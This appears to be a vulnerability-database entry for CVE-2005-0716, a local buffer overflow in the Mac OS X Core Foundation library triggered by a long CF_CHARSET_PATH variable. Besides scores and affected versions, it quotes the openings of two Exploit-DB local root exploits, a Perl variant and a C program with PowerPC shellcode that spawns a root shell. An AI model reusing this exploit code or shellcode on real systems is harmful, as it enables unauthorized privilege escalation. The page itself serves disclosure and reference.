CVE-2005-0716
Published 2005-03-21
Priority P425 · high · 7.2 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.05% (60.0th percentile)
Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute arbitrary code via a long CF_CHARSET_PATH environment variable.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
No detection rules found.
Exploit-DB
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)
exploitdb·2006-08-02
---
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to
Exploit-DB
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation
exploitdb·2005-03-22
---
/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]*********
* *
* by: [email protected] (fakehalo/realhalo) *
* *
* found by: iDefense (anon finder) *
* *
* saw the advisory on bugtraq and figured i'd slap this *
* together, so simple i had to. exploits via the *
* /usr/bin/su binary. you must press ENTER at the *
* "Password: " prompt. *
***********************************************************/
#include
#include
#include
#include
static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb"
"\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae"
"\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5"
"\x2a\x79\x38\x7f\xfe\xd8\x90
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
http://www.idefense.com/application/poi/display?id=219&type=vulnerabilities
http://www.securityfocus.com/bid/13224
Published: 2005-03-21